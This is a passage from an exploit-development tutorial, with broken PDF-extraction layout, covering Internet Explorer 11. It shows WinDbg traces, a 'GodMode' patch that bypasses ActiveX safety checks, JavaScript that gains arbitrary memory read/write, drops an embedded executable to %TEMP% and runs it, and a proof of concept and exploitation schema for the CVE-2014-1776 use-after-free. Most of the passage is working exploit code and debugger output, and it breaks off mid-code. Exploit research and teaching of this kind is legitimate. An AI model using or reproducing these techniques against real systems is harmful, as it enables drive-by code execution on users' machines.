04c05b4f 50              
push    eax
 
04c05b50 e86c020000      call    jscript9!ScriptEngine::CanCreateObject (04c05dc1)
 
04c05b55 85c0            test    eax,eax
 
04c05b57 0f84f4150400    je      jscript9!ScriptSite::CreateObjectFromProgID+0x116 (04c47151)
 
Step into it (
F11
) and ste
p until you get to the virtual call:
 
04c05df0 8d55f8          lea     edx,[ebp
-
8]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 480 
-
 
04c05df3 6a00            push    0
 
04c05df5 6a00            push    0
 
04c05df7 6a10            push    10h
 
04c05df9 ff7508          push    dword ptr [ebp+8]
 
04c05dfc 8b08   
         mov     ecx,dword ptr [eax]
 
04c05dfe 6a04            push    4
 
04c05e00 52              push    edx
 
04c05e01 6800120000      push    1200h
 
04c05e06 50              push    eax
 
04c05e07 ff5110          call    dword ptr [ecx+10h]  ds:002b:702bcda8=
{MSHTML!TearoffThunk4 (6f686f2b)}  <
---------------
 
04c05e0a 85c0            test    eax,eax
 
04c05e0c 7811            js      jscript9!ScriptEngine::CanCreateObject+0x5e (04c05e1f)
 
04c05e0e f645f80f        test    byte ptr [ebp
-
8],0Fh
 
04c05e12 6a00        
    push    0
 
04c05e14 58              pop     eax
 
04c05e15 0f94c0          sete    al
 
04c05e18 5e              pop     esi
 
04c05e19 8be5            mov     esp,ebp
 
04c05e1b 5d              pop     ebp
 
04c05e1c c20400          ret     4
 
In IE 10 we went to
 great lengths to return from 
CanCreateObject
 with a non null 
EAX
 and a null 
EDI
. But as 
we can see, in IE 11 there is no 
pop edi
. Does it mean that we can just call the function 
epilog
 (which 
doesn’t use 
leave
 anymore, by the way)?
 
Let’s gather some usefu
l information:
 
0:007> ln ecx
 
(702bcd98)   MSHTML!s_apfnPlainTearoffVtable   |  (702bd4a0)   MSHTML!GLSLFunctionInfo::s_info
 
Exact matches:
 
    MSHTML!s_apfnPlainTearoffVtable = <no type information>
 
0:007> ? 702bcd98
-
mshtml
 
Evaluate expression: 15453592 = 
00ebcd98
 
0:007> ? 04c05e19
-
jscript9
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 481 
-
 
Evaluate expression: 1400345 = 00155e19
 
Now let’s step out of 
CanCreateObject
 (
Shift+F11
):
 
04c05b50 e86c020000      call    jscript9!ScriptEngine::CanCreateObject (04c05dc1)
 
04c05b55 85c0            test    eax,eax      
<
-----------------
 we are here
 
04c05b57 0f84f4150400    je      jscript9!ScriptSite::CreateObjectFromProgID+0x116 (04c47151)
 
04c05b5d 6a05            push    5
 
04c05b5f 58              pop     eax
 
04c05b60 85ff            test    edi,edi      <
------------
----
 EDI must be 0
 
04c05b62 0f85fd351200    jne     jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x61a58 (04d2
9165)
 
It seems that 
EDI
 must still be 
0
, but the difference is that now 
CanCreateObject
 doesn’t use 
EDI
 anymore 
and so we don
’t need to clear it before returning from 
CanCreateObject
. This is great news!
 
Let’s change 
EAX
 so that we can reach 
CanObjectRun
, if it still exists:
 
r eax=1
 
Let’s keep stepping until we get to 
CanObjectRun
 and then step into it. After a while, we’ll reac
h a familiar 
virtual call
:
 
04c05d2c 53              push    ebx
 
04c05d2d 6a18            push    18h
 
04c05d2f 52              push    edx
 
04c05d30 8d55cc          lea     edx,[ebp
-
34h]
 
04c05d33 895de8          mov     dword ptr [ebp
-
18h],ebx
 
04c05d36 8b08 
           mov     ecx,dword ptr [eax]
 
04c05d38 52              push    edx
 
04c05d39 8d55c0          lea     edx,[ebp
-
40h]
 
04c05d3c 52              push    edx
 
04c05d3d 68845dc004      push    offset jscript9!GUID_CUSTOM_CONFIRMOBJECTSAFETY (04c05d84)
 
04c0
5d42 50              push    eax
 
04c05d43 ff5114          call    dword ptr [ecx+14h]  ds:002b:702bcdac={MSHTML!TearoffThunk5 (6f686efc)}  <
---------------
 
04c05d46 85c0            test    eax,eax
 
04c05d48 0f889c341200    js      jscript9!DListBase<CustomH
eap::Page>::DListBase<CustomHeap::Page>+0x61add (04d2
91ea)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 482 
-
 
04c05d4e 8b45c0          mov     eax,dword ptr [ebp
-
40h]
 
04c05d51 6a03            push    3
 
04c05d53 5b              pop     ebx
 
04c05d54 85c0            test    eax,eax
 
04c05d56 740f            je
      jscript9!ScriptEngine::CanObjectRun+0xaa (04c05d67)
 
04c05d58 837dcc04        cmp     dword ptr [ebp
-
34h],4
 
04c05d5c 7202            jb      jscript9!ScriptEngine::CanObjectRun+0xa3 (04c05d60)
 
04c05d5e 8b18            mov     ebx,dword ptr [eax]
 
04c05
d60 50              push    eax
 
04c05d61 ff1518a0e704    call    dword ptr [jscript9!_imp__CoTaskMemFree (04e7a018)]
 
04c05d67 6a00            push    0
 
04c05d69 f6c30f          test    bl,0Fh
 
04c05d6c 58              pop     eax
 
04c05d6d 0f94c0          se
te    al
 
04c05d70 8b4dfc          mov     ecx,dword ptr [ebp
-
4]
 
04c05d73 5f              pop     edi
 
04c05d74 5e              pop     esi
 
04c05d75 33cd            xor     ecx,ebp
 
04c05d77 5b              pop     ebx
 
04c05d78 e8b8b3eaff      call    jscript
9!__security_check_cookie (04ab1135)
 
04c05d7d 8be5            mov     esp,ebp
 
04c05d7f 5d              pop     ebp
 
04c05d80 c20800          ret     8
 
If we call the epilog of the function like before, we’ll skip the call to 
jscript9!_imp__CoTaskMemFree
, bu
t that 
shouldn’t be a problem. 
ECX
 points to the same vftable referred to in 
CanCreateObject
. Let’s compute the 
RVA
 of the epilog of 
CanObjectRun
:
 
0:007> ? 04c05d7d
-
jscript9
 
Evaluate expression: 1400189 = 00155d7d
 
Now we’re ready to write the javascript co
de. Here’s the full code:
 
XHTML
 
 
<html>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 483 
-
 
<head>
 
<script
 language=
"javascript"
>
 
  
(
function
 
()
 
{
 
    
CollectGarbage
();
 
    
var
 
header_size
 
=
 
0x20
;
 
    
var
 
array_len
 
=
 
(
0x10000
 
-
 
header_size
)/
4
;
 
    
var
 
a
 
=
 
new
 
Array
();
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
array_len
);
 
      
a
[
i
][
0
]
 
=
 
0
;
 
    
}
 
    
magic_addr
 
=
 
0xc000000
;
 
    
//           /
-------
 allocation header 
-------
\
 /
---------
 buffer header 
---------
\
 
    
// 0c000000: 00000000 0000fff0 00000000 00000000 00000000 0000000
1 00003ff8 00000000
 
    
//                                                       array_len buf_len
 
    
alert
(
"Modify the 
\
"Buffer length
\
" field of the Array at 0x"
 
+
 
magic_addr.toString
(
16
));
 
    
// Locate the modified Array.
 
    
var
 
idx
 
=
 
-
1
;
 
 
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
 
-
 
1
;
 
++
i
)
 
{
 
      
// We try to modify the first element of the next Array.
 
      
a
[
i
][
array_len
 
+
 
header_size
/
4
]
 
=
 
1
;
 
      
// If we successfully modified the first element of the next Array, then a[i]
 
      
// is the A
rray whose length we modified.
 
      
if
 
(
a
[
i
+
1
][
0
]
 
==
 
1
)
 
{
 
        
idx
 
=
 
i
;
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
idx
 
==
 
-
1
)
 
{
 
      
alert
(
"Can't find the modified Array"
);
 
      
return
;
 
    
}
 
    
// Modify the second Array for reading/writing eve
rywhere.
 
    
a
[
idx
][
array_len
 
+
 
0x14
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
][
array_len
 
+
 
0x18
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
+
1
].
length
 
=
 
0x3fffffff
;
 
    
var
 
base_addr
 
=
 
magic_addr
 
+
 
0x10000
 
+
 
header_size
;
 
    
// Very Important:
 
    
//    The numbers in Array are sign
ed int32. Numbers greater than 0x7fffffff are
 
    
//    converted to 64
-
bit floating point.
 
    
//    This means that we can't, for instance, write
 
    
//        a[idx+1][index] = 0xc1a0c1a0;
 
    
//    The number 0xc1a0c1a0 is too big to fit in a signed in
t32.
 
    
//    We'll need to represent 0xc1a0c1a0 as a negative integer:
 
    
//        a[idx+1][index] = 
-
(0x100000000 
-
 0xc1a0c1a0);
 
    
function
 
int2uint
(
x
)
 
{
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 484 
-
 
      
return
 
(
x
 
<
 
0
)
 
?
 
0x100000000
 
+
 
x
 
:
 
x
;
 
    
}
 
 
function
 
uint2int
(
x
)
 
{
 
      
retur
n
 
(
x
 
>=
 
0x80000000
)
 
?
 
x
 
-
 
0x100000000
 
:
 
x
;
 
    
}
 
 
// The value returned will be in [0, 0xffffffff].
 
    
function
 
read
(
addr
)
 
{
 
      
var
 
delta
 
=
 
addr
 
-
 
base_addr
;
 
      
var
 
val
;
 
      
if
 
(
delta
 
>=
 
0
)
 
        
val
 
=
 
a
[
idx
+
1
][
delta
/
4
];
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
        
val
 
=
 
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
];
 
      
return
 
int2uint
(
val
);
 
    
}
 
    
// val must be in [0, 0xffffffff].
 
    
function
 
write
(
addr
,
 
val
)
 
{
 
      
val
 
=
 
uint2int
(
val
);
 
      
var
 
delta
 
=
 
addr
 
-
 
base_addr
;
 
      
if
 
(
delta
 
>=
 
0
)
 
        
a
[
idx
+
1
][
delta
/
4
]
 
=
 
val
;
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
        
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
]
 
=
 
val
;
 
    
}
 
    
function
 
g
et_addr
(
obj
)
 
{
 
      
a
[
idx
+
2
][
0
]
 
=
 
obj
;
 
      
return
 
read
(
base_addr
 
+
 
0x10000
);
 
    
}
 
    
// Back to determining the base address of MSHTML...
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Projection::ArrayObjectInstance:
:`vftable' = jscript9 + 0x2d50
 
    
//      v
 
    
//  04ab2d50 151f1ec0 00000000 00000000
 
    
//  6f5569ce 00000000 0085f5d8 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x1569ce
 
    
var
 
addr
 
=
 
get_addr
(
docu
ment.createElement
(
"div"
));
 
    
jscript9
 
=
 
read
(
addr
)
 
-
 
0x2d50
;
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x1569ce
;
 
    
var
 
old1
 
=
 
read
(
mshtml
+
0xebcd98
+
0x10
);
 
    
var
 
old2
 
=
 
read
(
mshtml
+
0xebcd98
+
0x14
);
 
 
function
 
GodModeOn
()
 
{
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 485 
-
 
      
write
(
mshtml
+
0xebcd98
+
0
x10
,
 
jscript9
+
0x155e19
);
 
      
write
(
mshtml
+
0xebcd98
+
0x14
,
 
jscript9
+
0x155d7d
);
 
    
}
 
    
function
 
GodModeOff
()
 
{
 
      
write
(
mshtml
+
0xebcd98
+
0x10
,
 
old1
);
 
      
write
(
mshtml
+
0xebcd98
+
0x14
,
 
old2
);
 
    
}
 
 
// content of exe file encoded in base64.
 
  
runcalc
 
=
 
'TVqQAAMAAAAEAAAA//8AALgAAAAAA <snipped> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
;
 
    
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
   
GodModeOff
();
 
      
tStream.Type
 
=
 
2
;
       
// text
 
      
bStream.Type
 
=
 
1
;
       
// binary
 
      
tStream.Open
();
 
      
bStream.Open
();
 
      
tStream.WriteText
(
data
);
 
      
tStream.Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (wh
at are they?)
 
      
tStream.CopyTo
(
bStream
);
 
      
var
 
bStream_addr
 
=
 
get_addr
(
bStream
);
 
      
var
 
string_addr
 
=
 
read
(
read
(
bStream_addr
 
+
 
0x50
)
 
+
 
0x44
);
 
      
write
(
string_addr
,
 
0x003a0043
);
       
// 'C:'
 
      
write
(
string_addr
 
+
 
4
,
 
0x0000005c
);
   
// '
\
'
 
      
try
 
{
 
        
bStream.SaveToFile
(
fname
,
 
2
);
     
// 2 = overwrites file if it already exists
 
      
}
 
      
catch
(
err
)
 
{
 
        
return
 
0
;
 
      
}
 
      
tStream.Close
();
 
      
bStream.Close
();
 
      
return
 
1
;
 
    
}
 
    
function
 
decod
e
(
b64Data
)
 
{
 
      
var
 
data
 
=
 
window.atob
(
b64Data
);
 
      
// Now data is like
 
      
//   11 00 12 00 45 00 50 00 ...
 
      
// rather than like
 
      
//   11 12 45 50 ...
 
      
// Let's fix this!
 
      
var
 
arr
 
=
 
new
 
Array
();
 
      
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data.length
 
/
 
2
;
 
++
i
)
 
{
 
        
var
 
low
 
=
 
data.charCodeAt
(
i
*
2
);
 
        
var
 
high
 
=
 
data.charCodeAt
(
i
*
2
 
+
 
1
);
 
        
arr.push
(
String.fromCharCode
(
low
 
+
 
high
 
*
 
0x100
));
 
      
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 486 
-
 
      
return
 
arr.join
(
''
);
 
    
}
 
 
GodModeOn
();
 
    
var
 
shell
 
=
 
new
 
Active
XObject
(
"WScript.shell"
);
 
    
GodModeOff
();
 
    
fname
 
=
 
shell.ExpandEnvironmentStrings
(
"%TEMP%
\
\
runcalc.exe"
);
 
    
if
 
(
createExe
(
fname
,
 
decode
(
runcalc
))
 
==
 
0
)
 
{
 
//      alert("SaveToFile failed");
 
      
window.location.reload
();
 
      
return
 
0
;
 
    
}
 
    
s
hell.Exec
(
fname
);
 
    
alert
(
"Done"
);
 
  
})();
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
I snipped 
runcalc
. You can download the full code from here: 
code5
.
 
Try the code an
d it should work just fine!
 
The UAF bug
 
We’ll be using a UAF bug I found here:
 
https://withgit.com/hdarwin89/codeengn
-
2014
-
ie
-
1day
-
case
-
study/tree/master
 
Here’s the 
POC
:
 
XHTML
 
 
<html
 
xmlns:v
=
"urn:schemas
-
microsoft
-
com:vml"
>
 
<head
 id=
"haed"
>
 
<title>
IE Case Study 
-
 STEP1
</title>
 
<style>
 
        v
\
:*{Behavior: url(#default#VML)}
 
</style>
 
<meta
 http
-
equiv=
"X
-
UA
-
Compatible"
 content=
"IE=EmulateIE9"
 
/>
 
<script>
 
        
windo
w.onload
 
=
 
function
 
(){
 
            
var
 
head
 
=
 
document.getElementById
(
"haed"
)
 
            
tmp
 
=
 
document.createElement
(
"CVE
-
2014
-
1776"
)
 
            
document.getElementById
(
"vml"
).
childNodes
[
0
].
appendChild
(
tmp
)
 
            
tmp.appendChild
(
head
)
 
           
tmp
 
=
 
head.offsetParent
 
            
tmp.onpropertychange
 
=
 
function
(){
 
                
this
[
"removeNode"
](
true
)
 
                
document.createElement
(
"CVE
-
2014
-
1776"
).
title
 
=
 
""
 
            
}
 
            
head.firstChild.nextSibling.disabled
 
=
 
head
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 487 
-
 
      
}
 
</script>
 
</head>
 
<body>
<v:group id="vml" style="width:500pt;">
<div></div>
</group>
</body>
 
</html>
 
 
Enable the flags 
HPA
 and 
UST
 for 
iexplore.exe
 in 
gflags
:
 
 
When we open the page in IE, IE will crash here:
 
MSHTML!CMarkup::IsConnectedToPrimaryMarkup:
 
0aa9a244 8b81a4000000    mov     eax,dword ptr [ecx+0A4h] ds:002b:12588c7c=????????   <
------------
 crash!
 
0aa9a24a 56              p
ush    esi
 
0aa9a24b 85c0            test    eax,eax
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 488 
-
 
0aa9a24d 0f848aaa0800    je      MSHTML!CMarkup::IsConnectedToPrimaryMarkup+0x77 (0ab24cdd)
 
0aa9a253 8b400c          mov     eax,dword ptr [eax+0Ch]
 
0aa9a256 85c0            test    eax,eax
 
The freed obje
ct is pointed to by 
ECX
. Let’s determine the size of the object:
 
0:007> ? 1000 
-
 (@ecx & fff)
 
Evaluate expression: 1064 = 00000428
 
So the object is 
0x428
 bytes.
 
Here’s the stack trace:
 
0:007> k 10
 
ChildEBP RetAddr  
 
0a53b790 0a7afc25 MSHTML!CMarkup::IsConn
ectedToPrimaryMarkup
 
0a53b7d4 0aa05cc6 MSHTML!CMarkup::OnCssChange+0x7e
 
0a53b7dc 0ada146f MSHTML!CElement::OnCssChange+0x28
 
0a53b7f4 0a84de84 MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldD
efaultValue''+0x4
a64
 
0a53b860 0a84dedd MSHTML!SetNumberPropertyHelper<long,CSetIntegerPropertyHelper>+0x1d3
 
0a53b880 0a929253 MSHTML!NUMPROPPARAMS::SetNumberProperty+0x20
 
0a53b8a8 0ab8b117 MSHTML!CBase::put_BoolHelper+0x2a
 
0a53b8c0 0ab8aade MSHTML!CBase::put_Bool+0x24
 
0a53
b8e8 0aa3136b MSHTML!GS_VARIANTBOOL+0xaa
 
0a53b97c 0aa32ca7 MSHTML!CBase::ContextInvokeEx+0x2b6
 
0a53b9a4 0a93b0cc MSHTML!CElement::ContextInvokeEx+0x4c
 
0a53b9d0 0a8f8f49 MSHTML!CLinkElement::VersionedInvokeEx+0x49
 
0a53ba08 6ef918eb MSHTML!CBase::PrivateInvo
keEx+0x6d
 
0a53ba6c 6f06abdc jscript9!HostDispatch::CallInvokeEx+0xae
 
0a53bae0 6f06ab30 jscript9!HostDispatch::PutValueByDispId+0x94
 
0a53baf8 6f06aafc jscript9!HostDispatch::PutValue+0x2a
 
Now we need to develop a breakpoint which breaks exactly at the point
 of crash. This is necessary for when 
we remove the flag HPA and 
ECX
 points to a string of our choosing.
 
Let’s start by putting the following breakpoint right before we allow blocked content in IE:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 489 
-
 
bp MSHTML!CMarkup::IsConnectedToPrimaryMarkup
 
The breakpoi
nt will be triggered many times before the crash. Moreover, if we click on the page in IE, the 
breakpoint will be triggered some more times. It’s better to put an initial breakpoint on a parent call which is 
called only after we allow blocked content in IE
. The following breakpoint seems perfect:
 
bp MSHTML!CBase::put_BoolHelper
 
When the breakpoint is triggered, set also the following breakpoint:
 
bp MSHTML!CMarkup::IsConnectedToPrimaryMarkup
 
This last breakpoint is triggered 
3
 times before we reach the point
 (and time) of crash. So, from now on we 
can use the following standalone breakpoint:
 
bp MSHTML!CBase::put_BoolHelper "bc *; bp MSHTML!CMarkup::IsConnectedToPrimaryMarkup 3; g"
 
If you try it, you’ll see that it works perfectly!
 
Now we can finally try to ma
ke 
ECX
 point to our string. But before proceeding, disable the two flags HPA 
and UST:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 490 
-
 
 
Here’s the modified javascript code:
 
XHTML
 
 
<html
 
xmlns:v
=
"urn:schemas
-
microsoft
-
com:vml"
>
 
<head
 id=
"haed"
>
 
<title>
IE Case Study 
-
 STEP1
</title>
 
<style>
 
        v
\
:*{Behavior: url(#default#VML)}
 
</style>
 
<meta
 http
-
equiv=
"X
-
UA
-
Compatible"
 content=
"IE=EmulateIE9"
 
/>
 
<script>
 
        
window.onload
 
=
 
f
unction
 
(){
 
            
var
 
head
 
=
 
document.getElementById
(
"haed"
)
 
            
tmp
 
=
 
document.createElement
(
"CVE
-
2014
-
1776"
)
 
            
document.getElementById
(
"vml"
).
childNodes
[
0
].
appendChild
(
tmp
)
 
            
tmp.appendChild
(
head
)
 
            
tmp
 
=
 
head.
offsetParent
 
            
tmp.onpropertychange
 
=
 
function
(){
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 491 
-
 
                
this
[
"removeNode"
](
true
)
 
                
document.createElement
(
"CVE
-
2014
-
1776"
).
title
 
=
 
""
 
                
var
 
elem
 
=
 
document.createElement
(
"div"
);
 
             
elem.className
 
=
 
new
 
Array
(
0x428
/
2
).
join
(
"a"
);
 
            
}
 
            
head.firstChild.nextSibling.disabled
 
=
 
head
 
        
}
 
</script>
 
</head>
 
<body>
<v:group id="vml" style="width:500pt;">
<div></div>
</group>
</body>
 
</html>
 
 
Remember to set the followi
ng breakpoint:
 
bp MSHTML!CBase::put_BoolHelper "bc *; bp MSHTML!CMarkup::IsConnectedToPrimaryMarkup 3; g"
 
When the breakpoint is triggered, you should
 see something similar to this:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 492 
-
 
 
The UAF 
 
bug (2)
 
We will need to analyze the bug in 
IDA
.
 
This time I won’t show you how I determined the content of the string step by step because it’d be a very 
tedious exposition and you wouldn’t learn a
nything useful. First I’ll show you the relevant graphs so that you 
can follow along even without IDA, and then I’ll show you the complete “
schema
” used to exploit the UAF 
bug and modify the length of the chosen 
Array
.
 
Open 
mshtml
 in IDA then press 
Ctrl+P
 
(
Jump to function
), click on 
Search
 and enter 
CMarkup::IsConnectedToPrimaryMarkup
. Double click on the function and you’ll see the crash point:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 493 
-
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 494 
-
 
 
The nodes with the colored background are the only nodes whose code we execute. The 
pink
 nodes contain 
the c
rash, whereas the 
celeste
 (light blue) nodes contain the overwriting instruction we’ll use to modify the 
length of the chosen 
Array
.
 
Click on the signature of 
IsConnectedToPrimaryMarkup
, press 
Ctrl+X
 and select 
CMarkup::OnCssChange
 
(see again the stack tra
ce above if you need to). Here’s the graph of 
OnCssChange
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 495 
-
 

exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 496 
-
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 497 
-
 
Here’s the graph of 
CMarkup::IsPendingPrimaryMarkup
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 498 
-
 
Next is the graph of 
CMarkup::Root
:
 
 
Here’s the graph of 
C
Element::EnsureFormatCacheChange
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 499 
-
 
And, finally, this is the graph of 
CView::AddInvalidationTask
, the function which contains the ov
erwriting 
instruction (
inc
):
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 500 
-
 
 
Here’s the schema I devised:
 
 
Conditions to control the bug and force an INC of dword at magic_addr + 0x1b:
 
X = [ptr+0A4h] ==> Y = [X+0ch] ==>
 
            [Y+208h] is 0
 
            [Y+630h+248h] = [Y+878h] val to inc!      
<======
 
            [Y+630h+380h] = [Y+9b0h] has bit 16 set
 
            [Y+630h+3f4h] = [Y+0a24h] has bit 7 set
 
            
[Y+1044h] is 0
 
U = [ptr+118h] ==>  is 0 => V = [U
-
24h] => W = [V+1ch],
 
            
[W+0ah] has bit 1 set & bit 4 unset
 
            [
W+44h] has bit 7 set
 
            [W+5ch] is writable
 
[ptr+198h] has bit 12 set
 
Let’s consider the first two lines:
 
X = [ptr+0A4h] ==> Y = [X+0ch] ==>
 
            
[Y+208h] is 0
 
The term 
ptr
 is the 
dangling pointer
 (which should point to our string). The two
 lines above means 
[Y+208h]
 
must be 
0
, where 
Y
 is the value at 
X+0ch
, where 
X
 is the value at 
ptr+0a4h
.
 
Deducing such a schema can be time consuming and a little bit of trial and error may be necessary. The 
goal is to come up with a schema that results in 
an execution path which reaches the overwriting instruction 
and then resume the execution of the javascript code without any crashes.
 
It’s a good idea to start by identifying the 
must
-
nodes (in IDA), i.e. the nodes that must belong to the 
execution path. T
hen you can determine the conditions that must be met to make sure that those nodes 
belong to the execution path. Once you’ve done that, you start exploring the graph and see what are the 
suitable sub
-
paths for connecting the 
must
-
nodes.
 
You should check t
hat the schema above is correct by looking at the graphs and following the execution 
path.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 501 
-
 
IE11: Part 2
 
 
Comp
leting the exploit
 
As we saw, the 
POC
 uses 
window.onload
 because it requires that the javascript code is executed after the 
page has fully loaded. We must do the same in our exploit. We also need to make the required changes to 
the rest of the page. Here’s
 the resulting code:
 
XHTML
 
 
<html
 
xmlns:v
=
"urn:schemas
-
microsoft
-
com:vml"
>
 
<head
 id=
"haed"
>
 
<title>
IE Case Study 
-
 STEP1
</title>
 
<style>
 
        v
\
:*{Behavior: url(#default#VML)}
 
</style>
 
<meta
 http
-
equiv=
"X
-
UA
-
Compatible"
 content=
"IE=EmulateIE9"
 
/>
 
<scrip
t
 language=
"javascript"
>
 
  
window.onload
 
=
 
function
()
 
{
 
    
CollectGarbage
();
 
    
var
 
header_size
 
=
 
0x20
;
 
    
var
 
array_len
 
=
 
(
0x10000
 
-
 
header_size
)/
4
;
 
    
var
 
a
 
=
 
new
 
Array
();
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
array_len
);
 
    
a
[
i
][
0
]
 
=
 
0
;
 
    
}
 
    
magic_addr
 
=
 
0xc000000
;
 
    
//           /
-------
 allocation header 
-------
\
 /
---------
 buffer header 
---------
\
 
    
// 0c000000: 00000000 0000fff0 00000000 00000000 00000000 00000001 00003ff8 00000000
 
    
//             
                                          array_len buf_len
 
    
alert
(
"Modify the 
\
"Buffer length
\
" field of the Array at 0x"
 
+
 
magic_addr.toString
(
16
));
 
    
// Locate the modified Array.
 
    
var
 
idx
 
=
 
-
1
;
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
 
-
 
1
;
 
++
i
)
 
{
 
      
// We try to modify the first element of the next Array.
 
      
a
[
i
][
array_len
 
+
 
header_size
/
4
]
 
=
 
1
;
 
      
// If we successfully modified the first element of the next Array, then a[i]
 
      
// is the Array whose length we modified.
 
      
if
 
(
a
[
i
+
1
][
0
]
 
==
 
1
)
 
{
 
        
idx
 
=
 
i
;
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
idx
 
==
 
-
1
)
 
{
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 502 
-
 
      
alert
(
"Can't find the modified Array"
);
 
      
return
;
 
    
}
 
    
// Modify the second Array for reading/writing everywhere.
 
    
a
[
idx
][
array_len
 
+
 
0x14
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
][
array_len
 
+
 
0x18
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
+
1
].
length
 
=
 
0x3fffffff
;
 
    
var
 
base_addr
 
=
 
magic_addr
 
+
 
0x10000
 
+
 
header_size
;
 
    
// Very Important:
 
    
//    The numbers in Array are signed int32. Numbers greater than 0x7fffff
ff are
 
    
//    converted to 64
-
bit floating point.
 
    
//    This means that we can't, for instance, write
 
    
//        a[idx+1][index] = 0xc1a0c1a0;
 
    
//    The number 0xc1a0c1a0 is too big to fit in a signed int32.
 
    
//    We'll need to represent 
0xc1a0c1a0 as a negative integer:
 
    
//        a[idx+1][index] = 
-
(0x100000000 
-
 0xc1a0c1a0);
 
    
function
 
int2uint
(
x
)
 
{
 
      
return
 
(
x
 
<
 
0
)
 
?
 
0x100000000
 
+
 
x
 
:
 
x
;
 
    
}
 
 
function
 
uint2int
(
x
)
 
{
 
      
return
 
(
x
 
>=
 
0x80000000
)
 
?
 
x
 
-
 
0x100000000
 
:
 
x
;
 
    
}
 
 
// The value returned will be in [0, 0xffffffff].
 
    
function
 
read
(
addr
)
 
{
 
      
var
 
delta
 
=
 
addr
 
-
 
base_addr
;
 
      
var
 
val
;
 
      
if
 
(
delta
 
>=
 
0
)
 
        
val
 
=
 
a
[
idx
+
1
][
delta
/
4
];
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
        
val
 
=
 
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
];
 
      
return
 
int2uint
(
val
);
 
    
}
 
    
// val must be in [0, 0xffffffff].
 
    
function
 
write
(
addr
,
 
val
)
 
{
 
      
val
 
=
 
uint2int
(
val
);
 
      
var
 
delta
 
=
 
addr
 
-
 
base_a
ddr
;
 
      
if
 
(
delta
 
>=
 
0
)
 
        
a
[
idx
+
1
][
delta
/
4
]
 
=
 
val
;
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
        
a
[
idx
+
1
][(
0x100000000
 
+
 
